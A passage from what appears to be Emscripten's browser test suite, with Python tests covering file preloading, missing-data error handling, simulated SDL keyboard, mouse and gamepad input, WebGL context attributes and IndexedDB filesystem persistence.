os.makedirs('cdn')
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_test_file('data.txt', 'data')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl_image.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl_image.c', '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
self.compile_btest([
'sdl_image_jpeg.c', '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_test_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@no_chrome('see #7930')
@requires_graphics_hardware
def test_glgears_proxy(self):
# we modify the asm.js, this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates above test, but verifies we can run outside of the btest harness
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
def copy(to, js_mod, html_mod=lambda x: x):
create_test_file(to + '.html', html_mod(open('test.html').read().replace('test.js', to + '.js')))
create_test_file(to + '.js', js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for emterps in [
[],
['-DTEST_SLEEP', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'ASSERTIONS=1', '-s', "SAFE_HEAP=1"]
]:
print(delay, defines, emterps)
if emterps and self.is_wasm_backend():
return self.skipTest('no emterpretify with wasm backend')
create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
create_test_file('sdl_key.c', self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
self.compile_btest(['sdl_key.c', '-o', 'page.html'] + defines + emterps + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl_text.c', self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
self.compile_btest(['sdl_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('test_glfw_joystick.c', self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
self.compile_btest(['test_glfw_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS=1'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest('write_file.cpp', '0', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1'])
@unittest.skip('Skipping due to https://github.com/emscripten-core/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
create_test_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
create_test_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''] + extra)
@no_wasm_backend('emterpretify')
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
